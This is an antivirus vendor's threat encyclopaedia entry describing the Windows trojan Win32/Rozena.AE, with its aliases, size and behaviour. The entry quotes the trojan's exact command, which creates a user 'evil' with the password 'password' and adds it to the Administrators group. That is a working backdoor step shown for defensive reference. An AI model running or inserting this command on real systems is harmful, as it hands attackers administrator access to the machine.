Global sites
SolutionsProductsPurchaseDownloadPartnersSupportCompanyThreat Center
Threat CenterEset Online scannerESET SysInspectorThreatSense® ThreatSense.Net® Security TipsThreat LevelThreat Dictionary
Threat Encyclopaedia
Update infoVirus Radar on your Website
Antivirus Software NOD32 > Threat Center > Threat Encyclopaedia > R

Threat Encyclopaedia

Print this pageSend

Win32/Rozena.AE

Aliases:Downloader-CAG (McAfee), Win32/Heur (AVG) 
Type of infiltration:Trojan  
Size:87552 B 
Affected platforms:Microsoft Windows 
Signature database version:4736 (20100101) 

Short description

Win32/Rozena.AE is a trojan that creates a new Windows user account.

Installation

The trojan does not create any copies of itself.

Other information

The trojan executes the following command:
  • cmd.exe /c net user evil password /ADD && net localgroup Administrators evil /ADD
The trojan creates a new user account with the username:
  • evil
and the password:
  • password
The trojan adds the user "evil" to the "Administrators" group.